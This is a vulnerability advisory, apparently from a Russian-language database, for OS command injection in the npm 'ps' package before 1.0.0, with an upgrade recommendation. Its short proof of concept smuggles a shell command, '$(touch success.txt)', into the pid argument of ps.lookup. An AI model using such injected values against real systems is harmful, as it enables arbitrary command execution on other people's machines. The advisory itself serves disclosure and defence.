Описание
ps Enables OS Command Injection
Versions of ps before 1.0.0 are vulnerable to command injection.
Proof of concept:
var ps = require('ps');
ps.lookup({ pid: "$(touch success.txt)" }, function(err, proc) { // this method is vulnerable to command injection
if (err) {throw err;}
if (proc) {
console.log(proc); // Process name, something like "node" or "bash"
} else {
console.log('No such process');
}
});
// Result: The file success.txt will exist on the filesystem if the touch command was executed
Recommendation
Update to version 1.0.0 or later.
Пакеты
Наименование
ps
npm
Затронутые версииВерсия исправления
< 1.0.0
1.0.0
Связанные уязвимости
CVSS3: 9.8
nvd
больше 7 лет назад
A command Injection in ps package versions <1.0.0 for Node.js allowed arbitrary commands to be executed when attacker controls the PID.